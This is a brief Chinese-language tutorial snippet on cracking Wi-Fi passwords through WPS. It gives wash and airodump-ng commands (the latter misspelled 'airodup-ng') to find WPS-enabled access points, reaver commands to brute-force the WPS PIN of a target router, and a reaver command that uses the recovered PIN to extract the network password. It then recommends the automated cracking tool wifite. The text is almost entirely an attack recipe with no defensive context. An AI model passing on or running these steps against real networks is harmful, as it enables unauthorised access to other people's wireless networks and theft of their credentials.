1、启用监听模式(Monitor Mode),发现支持WPS的AP 如果进入监听模式请查阅前两章有关WPA WEP攻击的文章
wash -C -i wlan0mon#-C 忽略错误帧 -i 指定网卡
airodup-ng wlan0mon --wps
2、爆破PIN码
reaver -i wlan0mon -b <AP mac> -vv #-vv 显示详细的信息
3、在得出PIN码后,通过下面指令获取无线密码
reaver -i wlan0mon -b <AP mac> -vv -p 88888888 #-p 获取到的PIN码
干货!!综合自动化无线密码破解工具 wifite